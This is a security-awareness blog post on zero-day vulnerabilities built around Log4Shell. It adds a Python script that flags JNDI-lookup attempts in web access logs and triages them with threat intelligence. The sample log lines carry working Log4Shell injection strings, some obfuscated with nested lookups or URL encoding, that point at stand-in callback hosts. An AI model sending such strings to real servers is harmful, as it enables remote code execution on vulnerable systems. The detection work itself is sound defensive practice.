In recognition of Cyber Security Awareness Month, RedLegg’s 96 Bravo team will be providing security-focused content for the Information Security community, in hopes of proactively fostering a security-conscious mindset. In this week’s diary, we’ll highlight the importance of understanding Zero-Day Vulnerabilities.
Understanding Zero-Day Vulnerabilities
In a perfect world, vulnerabilities are reported promptly and responsibly, giving vendors a reasonable window to develop and release a patch. The reality is that vulnerabilities are practically inherent in software. Moreover, there is a distinct class of vulnerabilities that is unknown to the general public and, critically, to the vendor: zero-day vulnerabilities. A zero-day is a flaw that attackers know about, and are often already exploiting, before the vendor has a patch available. The name reflects that the vendor has had zero days to respond to the flaw, and until a fix ships, attackers can exploit it at will.
Log4J: Log4Shell (CVE-2021-44228) is a recent zero-day that affected Apache’s Log4J logging library. It is a critical remote code execution (RCE) vulnerability: a crafted string that reached a Log4J logging call could trigger a JNDI lookup to an attacker-controlled server, which returned code that the vulnerable application then loaded and executed. Log4J is embedded in a vast number of applications, internal tools, and commercial products, and that broad use made the attack far more widespread than a flaw in a single product would have been.
Security Monitoring – the collection and analysis of security-relevant logs and telemetry, using automated processes and tools such as a SIEM, to surface potential threats.
- Proactively defending against zero-day vulnerabilities begins with collecting the pertinent application logs and telemetry (web server access logs, application logs, DNS and outbound-connection logs) into the SIEM; you cannot detect exploitation of a component you do not log.
- Log analysis should be agile: structured, searchable log management paired with analysts who can triage effectively, so that when a new zero-day is disclosed the team can quickly query historical data for signs of exploitation.
- Enhanced visibility means ongoing reporting and an accurate, maintained inventory of the systems and software components (including third-party libraries) that are running and permitted on the network, so that affected assets can be identified quickly.
- A robust approach also incorporates threat intelligence (indicators, exploited-vulnerability catalogs, known attacker infrastructure) to speed response and prioritize incoming risks.
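As an added example (not part of the original RedLegg diary), the following Python script shows what the detection-and-triage loop above looks like in practice for Log4Shell: it parses web-server access-log lines, undoes the lookup obfuscations attackers used to hide the literal `${jndi:...}` string, flags each hit, and uses a threat-intelligence set to prioritize the resulting alerts. The log lines and the indicator set are constructed for the example; `KNOWN_BAD_HOSTS`, `Alert`, `scan_line`, and `triage` are names introduced here, not from any product.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic); the
# addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:25 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '192.0.2.44 - - [10/Dec/2021:14:03:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://192.0.2.44/x}"',
    '192.0.2.44 - - [10/Dec/2021:14:03:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.44%2Fz%7D HTTP/1.1" 200 512 "-" "python-requests/2.25"',
    '203.0.113.10 - - [10/Dec/2021:14:03:40 +0000] "GET /about HTTP/1.1" 200 2048 "-" "${date:yyyy}"',
]

# Constructed threat-intelligence set (hypothetical). In practice this is fed
# from CISA KEV context, a commercial feed, or your own incident history.
KNOWN_BAD_HOSTS = {"198.51.100.7"}

COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Lookup forms attackers use so the literal text "jndi" never appears in the request.
CASE_LOOKUP = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.I)   # ${lower:J} -> j
DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')          # ${::-j}, ${env:NOPE:-j} -> j
JNDI_LOOKUP = re.compile(
    r'\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/*(?P<host>[^/:}\s]*)', re.I
)


def normalize_lookups(text: str) -> str:
    """Expand nested Log4j lookups innermost-first, as Log4j itself would."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


@dataclass
class Alert:
    src_ip: str
    field: str          # which log field carried the lookup
    scheme: str         # ldap, rmi, dns, ...
    callback_host: str  # where a vulnerable host would connect back to
    priority: str       # P1: source or callback matches threat intel; P2: unknown actor
    raw: str


def scan_line(line: str, intel=KNOWN_BAD_HOSTS) -> list:
    """Return one Alert per log field that carries a JNDI lookup."""
    m = COMBINED_LOG.match(line)
    if not m:
        # Dropped here for brevity; in a SIEM, count parser failures, because
        # malformed input is exactly where attacker-controlled data hides.
        return []
    alerts = []
    for field in ("request", "referer", "agent"):
        # Undo URL escaping first, then expand lookups the way Log4j would.
        decoded = normalize_lookups(unquote(m.group(field)))
        hit = JNDI_LOOKUP.search(decoded)
        if hit:
            host = hit["host"]
            known = m["ip"] in intel or host in intel
            alerts.append(Alert(m["ip"], field, hit["scheme"].lower(), host,
                                "P1" if known else "P2", line))
    return alerts


def triage(lines, intel=KNOWN_BAD_HOSTS) -> dict:
    """Group alerts per source IP so the analyst sees actors, not raw lines."""
    summary = {}
    for line in lines:
        for a in scan_line(line, intel):
            entry = summary.setdefault(a.src_ip, {"count": 0, "schemes": set(), "priority": "P2"})
            entry["count"] += 1
            entry["schemes"].add(a.scheme)
            if a.priority == "P1":
                entry["priority"] = "P1"
    return summary


if __name__ == "__main__":
    for ip, entry in sorted(triage(SAMPLE_LOGS).items(), key=lambda kv: kv[1]["priority"]):
        print(f'{entry["priority"]} {ip}: {entry["count"]} hits via {sorted(entry["schemes"])}')
```

The lookup normalization is the part worth keeping: a detection that only matches the literal `jndi:` misses requests that wrap it in `${lower:...}` or `${::-...}` lookups, which attackers began using almost immediately after disclosure. In a SIEM the same logic becomes a regex or a normalization step in the ingest pipeline, and the prioritization rule stays the same: a hit whose source or callback host appears in your intelligence set goes to the top of the queue, while the rest are still investigated because a hit from an unknown actor may be the targeted one.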
This Cybersecurity Awareness Month, consider ways you can #seeyourselfincyber! Listed below are publicly available resources for the latest updates on vulnerabilities:
- The National Vulnerability Database (NVD) is a comprehensive, publicly available database of reported, known vulnerabilities.
- The Cybersecurity & Infrastructure Security Agency (CISA) maintains the Known Exploited Vulnerabilities (KEV) catalog, a list of vulnerabilities confirmed to be actively exploited in the wild, which is a strong input for patch prioritization.